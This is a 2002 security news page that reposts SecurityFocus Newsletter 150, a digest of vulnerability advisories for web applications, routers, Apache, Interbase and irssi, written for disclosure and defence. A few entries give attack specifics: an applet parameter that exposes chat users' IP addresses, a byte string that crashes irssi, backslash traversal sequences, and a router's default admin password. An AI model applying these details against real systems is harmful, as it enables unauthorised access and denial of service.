June 26th 2002
alert
OpenSSH vulnerability disclosed(alert thnx to Jeremy), or right on to the OpenSSH statement, the ISS statement or the CERT advisory CA-2002-18 (which as usual contains statements from various vendors). Please note upgrading to OpenSSH3.4(portable)1 seems a Good Thing(tm) as it "adds checks for a class of potential bugs (ISS advisory rev 2)".

More on the recent OpenSSH vulnerability (alert thnx to neo77777).

June 26th 2002
mod_ssl-2.8.10 release (Jun 24th) fixes off-by-one buffer overflow bug affecting compatibility functionality only. (Jedi/Sector One:SF-vulndev)

June 25th 2002
26 entries on tap. (SF)

1. MIT CGIEmail Arbitrary Recipient Mail Relay Vulnerability
7. Digi-Net Technologies DigiChat User IP Information Disclosure Vulnerability
8. Multiple Vendor Spoofed IGMP Report Denial Of Service Vulnerability
9. Mewsoft NetAuction Cross Site Scripting Vulnerability
10. PHP Classifieds Cross-Site Scripting Vulnerability
11. PHPEventCalendar Remote Command Execution Vulnerability
16. Zeroboard PHP Include File Arbitrary Command Execution Vulnerability
17. My Postcards MagicCard.CGI Arbitrary File Disclosure Vulnerability
18. Caucho Technology Resin Server View_Source.JSP Arbitrary File Disclosure Vulnerability
19. Caucho Technology Resin Server Denial Of Service Vulnerability
20. Apache Chunked-Encoding Memory Corruption Vulnerability
21. Wolfram Research webMathematica File Disclosure Vulnerability
22. Zyxel Prestige 642R Malformed Packet Denial Of Service Vulnerability
23. NetGear RP114 Administrative Access Via External Interface Vulnerability
24. PHPBB2 Install.PHP Remote File Include Vulnerability
26. OSCommerce Remote File Include Vulnerability
27. PHP-Address Remote File Include Vulnerability
31. Interbase GDS_Drop Interbase Environment Variable Buffer Overflow Vulnerability
32. Interbase GDS_Lock_MGR Interbase Environment Variable Buffer Overflow Vulnerability
33. WebScripts WebBBS Remote Command Execution Vulnerability
34. DeepMetrix LiveStats HTML Report Script Injection Vulnerability
35. 4D WebServer Long HTTP Request Buffer Overflow Vulnerability
36. phpShare Arbitrary Remote PHP File Include Vulnerability
37. Mandrake 8.2 Msec Insecure Default Permissions Vulnerability
38. UnixWare / Open UNIX ppptalk Local Privilege Escalation Vulnerability
40. IRSSI Long Malformed Topic Denial Of Service Vulnerability

------------------------------
SecurityFocus Newsletter 150

1. MIT CGIEmail Arbitrary Recipient Mail Relay Vulnerability
BugTraq ID: 5013
Remote: Yes
Date Published: Jun 14 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5013
Summary:

MIT cgiemail is designed to take the input of web forms and convert it to
an e-mail format defined by the author of the form. It was written for use
on UNIX and Linux variant operating systems.

A vulnerability has been reported for cgiemail that allows cgiemail to act
as an open relay for email. The vulnerability is due to failure of proper
santization of user supplied values. In particular the new line code "%0a"
is not filtered properly.

cgiemail uses templates when generating emails. To exploit this issue, an
attacker must know the exact path of a template file that cgiemail uses.
As well, the attacker must know of the fields that will be included in the
generated email.

As a result, a malicious user may trivially specify any email address,
effectively using the script as an open mail relay. This technique is well
known, and commonly used for sending unsolicited email.

7. Digi-Net Technologies DigiChat User IP Information Disclosure Vulnerability
BugTraq ID: 5019
Remote: Yes
Date Published: Jun 14 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5019
Summary:

DigiChat is a web based chat application maintained by Digi-Net. DigiChat
runs on most Microsoft Windows and UNIX platforms.

It is possible for chat users to obtain sensitive information about other
chat visitors.

By design, only ChatMasters are able to resolve the IP address of visiting
chat users. However, it is reportedly possible for users to obtain the IP
address of chat visitors by including '<Param Name="Showip"Value="True">'
in the chat applet. As a result, IP address information is disclosed when
viewing the information details of visitors.

An attacker may exploit this flaw to gain unauthorized access to sensitive
information about site users.

This issue has been reported in DigiChat 3.5, however other versions may
also be affected by this.

8. Multiple Vendor Spoofed IGMP Report Denial Of Service Vulnerability
BugTraq ID: 5020
Remote: Yes
Date Published: Jun 14 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5020
Summary:

Internet Group Management Protocol (IGMP) is the specified guidelines for
the management of Internet Multicast Routing management.

A problem with the implementation of the protocol in some operating
systems could lead to a denial of service.

It is possible for an arbitrary host to deny service to a system on the
same segment of network. In a situation where a multicast router sends a
membership report request, a host sending a unicast membership report
response to the primary responder can prevent the responder from sending a
message to the multicast router. In doing so, the router will not receive
a response from any host, and thus the transmission will time out and
cease.

This problem could result in an attacker launching a denial of service
against an affected host, and could additionally be used to deny service
to a range of vulnerable hosts on a subnet.

This vulnerability may additionally affect other operating systems, though
it is currently unknown which implementations may be vulnerable.

9. Mewsoft NetAuction Cross Site Scripting Vulnerability
BugTraq ID: 5023
Remote: Yes
Date Published: Jun 14 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5023
Summary:

Mewsoft NetAuction is designed for users to create auction sites. It is
developed for use with Microsoft Windows and Linux operating environments.

NetAuction does not filter script code from URI parameters, making it
prone to cross-site scripting attacks. Attacker-supplied HTML code may be
included in a malicious link to 'auction.cgi' via the 'terms' parameter.

The supplied HTML code will be executed in the browser of a web user who
visits this link, in the security context of the host running NetAuction.
Such a link might be included in a HTML e-mail or on a malicious webpage.

This may enable a remote attacker to steal cookie-based authentication
credentials from legitimate users of a host running NetAuction.

This issue has been reported in version 3.0, other versions may also be
vulnerable.

10. PHP Classifieds Cross-Site Scripting Vulnerability
BugTraq ID: 5022
Remote: Yes
Date Published: Jun 14 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5022
Summary:

PHP Classifieds is web-based classifieds software. It will run on most
Unix and Linux variants.

PHP Classifieds has been reported to be prone to cross-site scripting
attacks. This issue results from the failure of the 'latestwap.php' to
sanitize user-supplied input. Attackers may inject arbitrary HTML or
script code into the 'url' URI parameter via a malicious link. When the
malicious link is visited, the attacker's script code will be executed in
the web client of the user browsing the link, in the security context of
the website hosting the vulnerable software.

This may potentially be exploited to steal cookie-based authentication
credentials from legitimate users of the site hosting the software.

11. PHPEventCalendar Remote Command Execution Vulnerability
BugTraq ID: 5021
Remote: Yes
Date Published: Jun 14 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5021
Summary:

PHPEventCalendar is a web based calendar. It is implemented in PHP and
should be supported on UNIX and Linux variants as well as Microsoft
Windows operating environments.

A vulnerability has been reported in phpEventCalendar that may allow a
user of phpEventCalendar to execute commands on a vulnerable host.

The vulnerability exists in the 'index.php' file. The user supplied value
to the 'userfile' parameter is not properly sanitized.

Commands executed via this method will be executed with the privileges of
the user running the web server process. This could potentially lead to a
denial of service, or a remote attacker gaining elevated privileges.

16. Zeroboard PHP Include File Arbitrary Command Execution Vulnerability
BugTraq ID: 5028
Remote: Yes
Date Published: Jun 15 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5028
Summary:

Zeroboard is a PHP web board package available for the Linux and Unix
platforms.

A problem with Zeroboard could make it possible for remote users to
execute arbitrary commands.

Under some circumstances, it may be possible to include arbitrary PHP
files. The _head.php file does not sufficiently check or sanitize input.
When the "allow_url_fopen" variable and the "register_globals" variable in
php.ini are set to "On," it is possible to load a PHP include file from a
remote URL via the _head.php script.

Upon loading the arbitrary include file, commands embedded in the file
would be executed on the vulnerable server with the privileges of the HTTP
process. This problem could allow an attacker to execute arbitrary
commands on the vulnerable system.

17. My Postcards MagicCard.CGI Arbitrary File Disclosure Vulnerability
BugTraq ID: 5029
Remote: Yes
Date Published: Jun 15 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5029
Summary:

My Postcards is a commercial available eletronic postcard system. It is
available for Unix and Linux Operating Systems.

A problem with My Postcards could make it possible for a remote attacker
to disclose the contents of arbitrary files.

The magiccard.cgi script does not properly handle some types of input.
As a result, it may be possible for a remote user to specify the location
of a specific file on the system hosting the My Postcards software. Upon
specifying the location of a file that is readable by the web server
process, the user could disclose the contents of the specified file.

This problem could lead to a remote user gaining access to sensitive
information on a system. This could include information such as access
control passwords, or other information stored on the server not meant for
public access.

18. Caucho Technology Resin Server View_Source.JSP Arbitrary File Disclosure Vulnerability
BugTraq ID: 5031
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5031
Summary:

Caucho Technology Resin is a servlet and JSP (Java Server Pages) engine
that supports java and javascript. It is built for Unix and Linux variants
as well as Microsoft Windows operating environments.

A vulnerability has been reported in Resin Server 2.1.2, deployed on a
Microsoft Windows platform, that may allow remote attackers to view
contents of arbitrary files.

The 'view_source.jsp' script, found in an example folder as part of the
Resin Server installation, may allow remote attackers access to files
readable by the web server.

The vulnerability occurs when parsing requests for directory traversal.
The 'view_source.jsp' script prevents directory traversal via '/../'
sequences. However, an attacker attempting directory traversal via '\..\'
sequences will succeed. This may allow an attacker to request any files on
the vulnerable system readable by the web server.

This problem could lead to a remote user gaining access to sensitive
information on a system. This could include information such as access
control passwords, or other information stored on the server not meant for
public access.

19. Caucho Technology Resin Server Denial Of Service Vulnerability
BugTraq ID: 5032
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5032
Summary:

Caucho Technology Resin is a servlet and JSP (Java Server Pages) engine
that supports java and javascript. It is built for Unix and Linux variants
as well as Microsoft Windows operating environments.

A vulnerability has been reported in Resin Server 2.1.1, deployed on a
Microsoft Windows platform, that may cause Resin Server to cease
functioning properly leading to a denial of service condition.

The vulnerability occurs when a client accesses non-existent resources.
If large variables are defined for such requests, parts (if not all) of
Resin will cease to be fully operational. A denial of service condition
may result.

An attacker may take advantage of this vulnerability to deny service to
legitimate users.

20. Apache Chunked-Encoding Memory Corruption Vulnerability
BugTraq ID: 5033
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5033
Summary:

Apache is a freely available webserver for Unix and Linux variants, as
well as Microsoft operating systems.

The HTTP protocol specifies a method of data coding called 'Chunked
Encoding', designed to facilitate fragmentation of HTTP requests in
transit. A vulnerability has been discovered in the Apache implementation
of 'Chunked Encoding'.

When processing requests coded with the 'Chunked Encoding' mechanism,
Apache fails to properly calculate required buffer sizes. This may be due
to improper (signed) interpretation of an unsigned integer value.

Consequently, several conditions may occur that have security
implications. It has been reported that a buffer overrun and signal race
condition occur. Exploitation of these conditions may result in the
execution of arbitrary code.

On Windows and Netware platforms, Apache uses threads within a single
server process to handle concurrent connections. Causing the server
process to crash on these platforms may result in a denial of service.

It has been confirmed that this vulnerability may be exploited to execute
arbitrary code on both Win32 and UNIX platforms.

Note: Products which use or bundle Apache such as Oracle 9iAS or IBM
Websphere may also be affected.

21. Wolfram Research webMathematica File Disclosure Vulnerability
BugTraq ID: 5035
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5035
Summary:

Wolfram Research's webMathematica is a Java based product which allows the
inclusion of Mathematica content in a web environment. It includes CGI
programs which generate image content based on user supplied input.

A file disclosure vulnerability has been reported with the MSP CGI
program. MSP is capable of redirecting a HTTP request to a dynamically
generated image, and accepts the filename as a CGI parameter. The user
supplied file name is not properly validated before the file is displayed.

An attacker may include "../" characters in the specified filename, and
escape the specified web root. Arbitrary system files may be disclosed to
the remote user. The disclosure of sensitive system information may aid in
further attacks against the vulnerable system.

22. Zyxel Prestige 642R Malformed Packet Denial Of Service Vulnerability
BugTraq ID: 5034
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5034
Summary:

ZyXEL 642R routers have difficulties handling packets with certain TCP
options enabled. In particular, it is possible to deny services by
sending a vulnerable router a SYN-ACK packet. This type of malformed
packet will create a denial of service which can only be remedied by
restarting the device. To a lesser degree, the router also encounters
difficulties when handling SYN-FIN packets. SYN-FIN packets have been
reported to deny service for the duration of a few minutes. This issue
has also been reproduced with other types of malformed packets.

In both instances, some services provided by the router (telnet, FTP and
DHCP) will be denied, however, the device will continue to route network
traffic.

ZyXEL 642R-11 routers are reportedly affected by this vulnerability. It
is possible that other ZyNOS-based routers are also affected by this
vulnerability. ZxXEL 643 ADSL routers do not appear to be prone to this
issue.

This issue may be exploited in combination with the vulnerability
described in Bugtraq ID 3346.

23. NetGear RP114 Administrative Access Via External Interface Vulnerability
BugTraq ID: 5036
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5036
Summary:

The NetGear RP114 router includes administrative support through a variety
of mechanisms, including telnet and HTTP. Access to administration tools
is granted to systems with the address 192.168.0.1, reserved for use on
internal networks.

Reportedly, the RP114 router will accept traffic from addresses in the
192.168.x.x range on it's external interface. An attacker external to the
router may be able to connect to the device from this IP, and access the
administrative interface. An attacker may be able to gain access to
sensitive information, or to create a denial of service condition for
legitimate users of the router.

Authentication is still required, however the device has a commonly known
default username of 'admin' with the password '1234'.

Other related devices may share this vulnerability, this has not however
been confirmed.

24. PHPBB2 Install.PHP Remote File Include Vulnerability
BugTraq ID: 5038
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5038
Summary:

phpBB2 is an open-source web forum application that is written in PHP and
backended by a number of database products. It will run on most Unix and
Linux variants, as well as Microsoft Windows operating systems.

A problem has been discovered in phpBB2 which may enable an attacker to
include an arbitrary attacker-supplied file which is located on a remote
host.

The problem is that an arbitrary path can be specified as a value for the
'phpbb_root_path' URL parameter. This issue exists in the 'install.php'
script. An attacker may exploit this vulnerability by supplying the
location of a remote file as the value for the 'phpbb_root_path' URL
parameter.

In the case that the remote file is a PHP script, this may allow commands
to be executed remotely with the privileges of the webserver. Successful
exploitation will allow a remote attacker to gain local, interactive
access to a host running the vulnerable software. This is especially a
concern for hosts running Microsoft Windows operating systems, as
webservers are generally run with SYSTEM privileges on these platforms.

26. OSCommerce Remote File Include Vulnerability
BugTraq ID: 5037
Remote: Yes
Date Published: Jun 16 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5037
Summary:

osCommerce is open-source e-commerce software written in PHP. osCommerce
will run on most Unix and Linux variants as well as Microsoft Windows
operating systems.

osCommerce is prone to an issue which may allow remote attackers to
include arbitrary files located on remote servers. This issue is present
in the 'include_once.php'. An attacker may exploit this by supplying a
path to a file on a remote host as a value for the 'include_file'
parameter.

If the remote file is a PHP script, this may allow for execution of
attacker-supplied PHP code with the privileges of the webserver.
Successful exploitation may gain the attacker local access on the affected
host.

27. PHP-Address Remote File Include Vulnerability
BugTraq ID: 5039
Remote: Yes
Date Published: Jun 17 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5039
Summary:

PHP-Address is an open-source web-based address database written in PHP.

PHP-Address is prone to an issue which may allow remote attackers to
include arbitrary files located on remote servers. This issue is present
in the 'globals.php3' script. An attacker may exploit this by supplying a
path to a file on a remote host as a value for the 'LangCookie' parameter.

If the remote file is a PHP script, this may allow for execution of
attacker-supplied PHP code with the privileges of the webserver.
Successful exploitation may provide local access to the attacker.

31. Interbase GDS_Drop Interbase Environment Variable Buffer Overflow Vulnerability
BugTraq ID: 5044
Remote: No
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5044
Summary:

Interbase is a database distributed and maintained by Borland. It is
available for Unix and Linux operating systems.

A problem with Interbase could make it possible for a local user to gain
elevated privileges.

A buffer overflow has been discovered in the setuid root gds_drop program
packaged with Interbase. This problem could allow a local user to execute
the program with strings of arbitrary length. By using a custom crafted
string, the attacker could overwrite stack memory, including the return
address of a function, and potentially execute arbitrary code as root.

The vulnerability occurs in the INTERBASE environment variable. When the
gds_drop program is executed with a string of arbitrary length (typically
500 or more characters) in the INTERBASE environment variable, the result
in an exploitable buffer overflow.

This could make it possible for a local user to gain administrative
access.

32. Interbase GDS_Lock_MGR Interbase Environment Variable Buffer Overflow Vulnerability
BugTraq ID: 5046
Remote: No
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5046
Summary:

Interbase is a database distributed and maintained by Borland. It is
available for Unix and Linux operating systems.

A problem with Interbase could make it possible for a local user to gain
elevated privileges.

A buffer overflow has been discovered in the setuid root program
gds_lock_mgr, packaged with Interbase. This problem could allow a local
user to execute the program with strings of arbitrary length. By using a
custom crafted string, the attacker could overwrite stack memory,
including the return address of a function, and potentially execute
arbitrary code as root.

The vulnerability occurs in the INTERBASE environment variable. When the
gds_lock_mgr program is executed with a string of arbitrary length
(typically 500 or more bytes) in the INTERBASE environment variable, the
result in an exploitable buffer overflow.

This could make it possible for a local user to gain administrative
access.

33. WebScripts WebBBS Remote Command Execution Vulnerability
BugTraq ID: 5048
Remote: Yes
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5048
Summary:

WebBBS is web-based BBS software, written in Perl. WebBBS was designed to
run on Unix and Linux variants.

WebBBS does not sufficiently filter shell metacharacters from CGI
parameters. As a result, remote attackers may execute arbitrary commands
on the underlying shell of the system hosting the vulnerable software.
This issue is known to exist in the 'webbbs_post.pl' script and is due to
insufficient filtering of the 'followup' CGI variable.

Remote attackers may gain local, interactive access to the host with the
privileges of the webserver process as a result of successful
exploitation.

34. DeepMetrix LiveStats HTML Report Script Injection Vulnerability
BugTraq ID: 5047
Remote: Yes
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5047
Summary:

LiveStats parses web server log files into an SQL database, enabling a
user to generate reports defining site traffic. The HTML generated reports
are viewed through the LiveStats web browser interface. LiveStats runs on
Microsoft Windows and is maintained by DeepMetrix, formerly known as
MediaHouse Software.

LiveStats does not filter HTML tags when generating reports. As a result,
it is possible for an attacker to cause arbitrary script code to be
included in HTML reports generated by LiveStats. When a user views the
report page via the browser interface, the script code will be executed in
their browser, in the context of the LiveStats host.

Reportedly, LiveStats displays the browser-tag and referer strings in the
HTML generated reports. Therefore, including script code in the
HTTP_Referer header when submitting a web request for a page being
monitored by LiveStats, will result in the execution of the embedded
script code.

This issue might be exploited to steal cookie-based authentication
credentials from a legitimate user of the software.

This issue has been reported in 6.2, prior versions may also be affected
by this issue.

35. 4D WebServer Long HTTP Request Buffer Overflow Vulnerability
BugTraq ID: 5045
Remote: Yes
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5045
Summary:

4D WebServer is a client/server database management system with integrated
web development and serving. It runs on Microsoft Windows and MacOS
operating systems.

Due to insufficient bounds checking of HTTP requests, 4D WebServer is
prone to a buffer overflow condition. It is possible to overwrite stack
variables such as the return address by overflowing either of these
fields. This may enable a remote attacker to cause a denial of service or
execute attacker-supplied instructions.

It should be noted that the software will run in the SYSTEM context on
multi-user Windows operating systems, so successful exploitation may
result in a full compromise of the host.

This issue may be similar to the vulnerability discussed in BID 4665, 4D
WebServer Authentication Buffer Overflow.

This issue was reported for 4D WebServer version 6.7.3, earlier versions
may also be affected.

36. phpShare Arbitrary Remote PHP File Include Vulnerability
BugTraq ID: 5049
Remote: Yes
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5049
Summary:

phpShare provides upload and download functionality via a web interface.
phpShare is a freely available and is maintained by Drak0n.

phpShare is prone to an issue which may allow remote attackers to include
arbitrary files located on remote servers. This issue is present in the
'phpshare.php' script.

If the remote file is a PHP script, this may allow for execution of
attacker-supplied PHP code with the privileges of the webserver.
Successful exploitation may provide local access to the attacker.

37. Mandrake 8.2 Msec Insecure Default Permissions Vulnerability
BugTraq ID: 5050
Remote: No
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5050
Summary:

Mandrake ships with an interface for setting and maintaining system-wide
security policy during an install of the operating system. This
functionality is provided by the Mandrake-Security package (msec).
Various settings provide differing levels of security.

The Mandrake 8.2 version of msec installs home directories with
world-readable permissions on the Standard security setting. This is
misleading as the Standard (msec level 2) security setting is intended to
be ideal for systems which have multiple local users. This may expose
contents of home directories to other local users. Additionally, msec
will proactively reset the permissions of home directories if they are
changed from the default world-readable permissions.

msec is a mandatory component of Mandrake 8.2 and may not be deselected
during an install of the operating system.

It should be noted that it is still possible to ensure more secure home
directory permissions by using a more restrictive msec setting.

38. UnixWare / Open UNIX ppptalk Local Privilege Escalation Vulnerability
BugTraq ID: 5051
Remote: No
Date Published: Jun 18 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5051
Summary:

UnixWare and Open UNIX are operating systems maintained by Caldera
Systems.

The ppptalk utility is used to configure the UnixWare/Open UNIX PPP
subsystem. It is installed setuid root by default.

A vulnerability has been reported in the version of ppptalk included with
some versions of Caldera UnixWare and Open UNIX. A malicious local user
may be able to exploit this vulnerability to gain elevated privileges on
the vulnerable system.

The technical nature of this vulnerability is not currently known.

40. IRSSI Long Malformed Topic Denial Of Service Vulnerability
BugTraq ID: 5055
Remote: Yes
Date Published: Jun 19 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/5055
Summary:

irssi is a freely available, open source irc client. irssi is available
for the Linux and Unix operating systems.

irssi version 0.8.4 is prone to a denial of service condition when a user
joins a channel with a long, malformed topic. The vulnerability occurs
when a user attempts to join a channel that has an overly long topic
description. When the string, "\x1b\x5b\x30\x6d\x0d\x0a", is appended to
the topic, irssi will crash resulting in a denial of service.

An attacker can cause irssi clients to crash by changing the topic of a
channel while users are still online or by enticing users to join channels
with malformed topic descriptions.

An attacker may take advantage of this vulnerability to deny service to
legitimate users.